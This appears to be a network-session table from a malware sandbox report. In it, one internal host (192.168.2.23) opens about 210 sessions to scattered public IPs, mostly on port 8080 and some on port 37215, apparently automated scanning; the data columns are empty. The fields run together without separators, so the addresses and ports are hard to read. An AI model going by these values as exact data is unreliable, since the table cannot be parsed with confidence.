                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34206192.168.2.2341820179.143.234.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34207192.168.2.2356214186.105.240.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34208192.168.2.2347416189.251.179.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34209192.168.2.2357632209.16.221.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34210192.168.2.2351348220.55.37.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34211192.168.2.235688432.241.244.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34212192.168.2.234784265.55.64.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34213192.168.2.2348672111.128.134.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34214192.168.2.2344150110.176.64.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34215192.168.2.2351494136.93.90.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34216192.168.2.234331699.62.255.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34217192.168.2.233367219.72.70.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34218192.168.2.235669067.84.224.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34219192.168.2.235808023.234.57.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34220192.168.2.2340958138.164.50.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34221192.168.2.235769270.179.25.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34222192.168.2.235313469.150.217.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34223192.168.2.2354740129.174.26.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34224192.168.2.2347902101.111.159.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34225192.168.2.234181063.132.212.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34226192.168.2.2337240139.117.218.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34227192.168.2.2336366148.197.142.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34228192.168.2.2343280160.211.223.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34229192.168.2.233552072.121.32.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34230192.168.2.2351078200.47.17.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34231192.168.2.2334048170.154.191.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34232192.168.2.2352282157.84.27.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34233192.168.2.2339672114.152.196.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34234192.168.2.235924883.227.199.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34235192.168.2.234232019.57.196.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34236192.168.2.233907699.251.221.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34237192.168.2.233404495.33.183.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34238192.168.2.234259832.215.9.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34239192.168.2.233531075.219.84.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34240192.168.2.234657637.109.193.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34241192.168.2.2360974200.54.161.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34242192.168.2.2338064159.187.179.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34243192.168.2.2351104101.227.226.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34244192.168.2.235549667.210.157.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34245192.168.2.2351840173.45.95.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34246192.168.2.2358560171.251.12.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34247192.168.2.235259243.176.89.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34248192.168.2.2344542121.194.142.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34249192.168.2.234777684.150.197.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34250192.168.2.235812683.79.133.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34251192.168.2.235912077.137.133.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34252192.168.2.2333504103.63.101.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34253192.168.2.2337768198.228.26.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34254192.168.2.234711092.147.40.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34255192.168.2.233950260.190.74.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34256192.168.2.2352126222.141.154.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34257192.168.2.2348280168.220.39.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34258192.168.2.2334524174.57.83.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34259192.168.2.2348158122.227.4.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34260192.168.2.2348582206.17.26.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34261192.168.2.2346482139.151.246.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34262192.168.2.2335556180.252.115.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34263192.168.2.233281231.153.76.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34264192.168.2.2344796157.149.30.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34265192.168.2.2341716197.230.198.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34266192.168.2.235733093.100.192.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34267192.168.2.2344846197.15.17.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34268192.168.2.2348302197.165.30.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34269192.168.2.235113484.185.96.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34270192.168.2.2360914147.237.14.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34271192.168.2.2335736184.204.118.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34272192.168.2.233403293.54.55.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34273192.168.2.2334548146.248.109.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34274192.168.2.2349634181.220.115.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34275192.168.2.2352166179.239.15.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34276192.168.2.2341624130.152.25.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34277192.168.2.2339356114.240.38.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34278192.168.2.235751863.32.170.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34279192.168.2.2342460178.119.129.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34280192.168.2.2341024142.214.232.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34281192.168.2.235560093.200.153.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34282192.168.2.2346128206.68.249.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34283192.168.2.2341176131.37.230.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34284192.168.2.2334144192.15.160.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34285192.168.2.2344904175.207.229.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34286192.168.2.235742274.188.176.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34287192.168.2.235503441.242.43.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34288192.168.2.234999088.72.92.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34289192.168.2.233291683.239.193.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34290192.168.2.234681827.233.37.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34291192.168.2.234682012.96.139.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34292192.168.2.2357272202.123.117.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34293192.168.2.235838076.154.42.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34294192.168.2.2334620133.205.129.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34295192.168.2.234694634.235.119.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34296192.168.2.2345754189.62.72.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34297192.168.2.2354238191.14.203.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34298192.168.2.2339884151.225.9.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34299192.168.2.2333886158.114.195.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34300192.168.2.2351412171.253.46.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34301192.168.2.234452450.40.148.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34302192.168.2.2338542165.110.42.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34303192.168.2.234904645.100.135.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34304192.168.2.235679280.114.240.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34305192.168.2.2356664102.179.205.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34306192.168.2.2335484176.115.243.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34307192.168.2.2345552128.36.111.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34308192.168.2.2345204207.1.100.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34309192.168.2.234909461.248.122.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34310192.168.2.2340358143.113.140.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34311192.168.2.235092665.205.247.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34312192.168.2.2344790161.3.97.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34313192.168.2.2336688125.39.208.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34314192.168.2.233504039.149.30.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34315192.168.2.2336050203.79.233.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34316192.168.2.235448875.148.60.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34317192.168.2.2335852203.247.30.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34318192.168.2.236045037.67.248.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34319192.168.2.2346564112.189.49.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34320192.168.2.2346608221.17.253.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34321192.168.2.234992297.181.115.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34322192.168.2.2350232122.103.9.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34323192.168.2.234763440.83.120.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34324192.168.2.23523282.108.80.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34325192.168.2.2338994216.136.70.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34326192.168.2.2341158213.51.140.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34327192.168.2.234329050.18.74.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34328192.168.2.234256614.181.100.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34329192.168.2.233932624.110.18.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34330192.168.2.235151649.30.161.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34331192.168.2.2355828147.126.123.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34332192.168.2.234567848.139.173.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34333192.168.2.2342410139.41.87.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34334192.168.2.2343694105.118.233.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34335192.168.2.235766458.122.117.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34336192.168.2.2347996110.181.177.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34337192.168.2.2358254172.142.137.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34338192.168.2.2334552171.108.156.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34339192.168.2.233421841.91.9.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34340192.168.2.2347170126.45.196.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34341192.168.2.2332932151.174.178.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34342192.168.2.2341800151.145.135.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34343192.168.2.234639090.124.239.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34344192.168.2.233861217.111.193.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34345192.168.2.2336470145.64.184.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34346192.168.2.235307689.82.54.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34347192.168.2.2351036108.65.228.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34348192.168.2.2341048190.38.194.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34349192.168.2.235723812.96.92.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34350192.168.2.2357540111.132.143.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34351192.168.2.2353538183.26.92.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34352192.168.2.2344032203.59.53.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34353192.168.2.2352298199.110.34.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34354192.168.2.235490680.1.164.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34355192.168.2.2357140210.134.251.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34356192.168.2.235112235.247.25.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34357192.168.2.2337946143.147.120.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34358192.168.2.2340260204.59.247.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34359192.168.2.2345512220.214.111.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34360192.168.2.2359710151.209.28.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34361192.168.2.2338814201.255.130.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34362192.168.2.2351806207.222.146.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34363192.168.2.2342452143.145.171.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34364192.168.2.2342710206.244.213.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34365192.168.2.2338672100.15.177.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34366192.168.2.2349572133.183.190.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34367192.168.2.2333422163.207.228.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34368192.168.2.2344288173.201.45.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34369192.168.2.2356446114.62.240.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34370192.168.2.233637094.142.45.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34371192.168.2.2352184189.251.118.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34372192.168.2.2347860113.0.234.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34373192.168.2.2352648112.11.40.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34374192.168.2.2335918176.79.164.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34375192.168.2.233877698.5.63.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34376192.168.2.2360964121.171.159.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34377192.168.2.2358992125.52.28.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34378192.168.2.2350608130.18.84.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34379192.168.2.2340568110.108.241.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34380192.168.2.2334920174.28.225.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34381192.168.2.235490089.193.209.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34382192.168.2.235666482.31.222.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34383192.168.2.233331264.140.43.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34384192.168.2.233385274.99.175.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34385192.168.2.234094459.0.148.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34386192.168.2.2333812195.224.74.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34387192.168.2.2334230131.123.182.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34388192.168.2.2340130185.84.198.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34389192.168.2.236009279.47.239.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34390192.168.2.234803835.193.97.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34391192.168.2.235198635.214.55.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34392192.168.2.2334440185.196.64.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34393192.168.2.233485437.72.138.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34394192.168.2.234021084.30.86.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34395192.168.2.2345168112.13.57.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34396192.168.2.2345984164.225.21.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34397192.168.2.233308083.97.178.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34398192.168.2.233292084.193.99.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34399192.168.2.2335316103.227.54.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34400192.168.2.2358082142.133.131.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34401192.168.2.2359836178.97.246.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34402192.168.2.236098813.93.161.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34403192.168.2.2334728108.101.155.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34404192.168.2.2338878111.159.169.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34405192.168.2.23584249.223.218.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34406192.168.2.2355744102.236.127.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34407192.168.2.2341402179.124.71.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34408192.168.2.2352798129.60.28.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34409192.168.2.2360326200.40.140.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34410192.168.2.2344020103.33.117.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34411192.168.2.235348065.110.189.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34412192.168.2.2339716115.224.208.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34413192.168.2.2357496119.245.63.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34414192.168.2.2345826161.253.126.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34415192.168.2.2338736115.203.155.188080
                                                        TimestampBytes transferredDirectionData


